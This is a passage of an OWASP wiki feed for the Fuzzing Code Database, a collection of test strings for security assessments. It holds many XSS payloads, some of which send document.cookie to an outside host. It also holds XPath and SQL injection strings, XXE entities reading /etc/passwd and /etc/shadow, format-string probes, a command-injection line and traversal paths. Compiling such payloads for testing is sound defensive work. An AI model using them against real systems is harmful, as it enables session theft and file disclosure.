&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80088</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80088"/>
				<updated>2010-03-17T22:31:34Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''17 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*---------------&lt;br /&gt;
&lt;br /&gt;
'''16 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*---------------&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
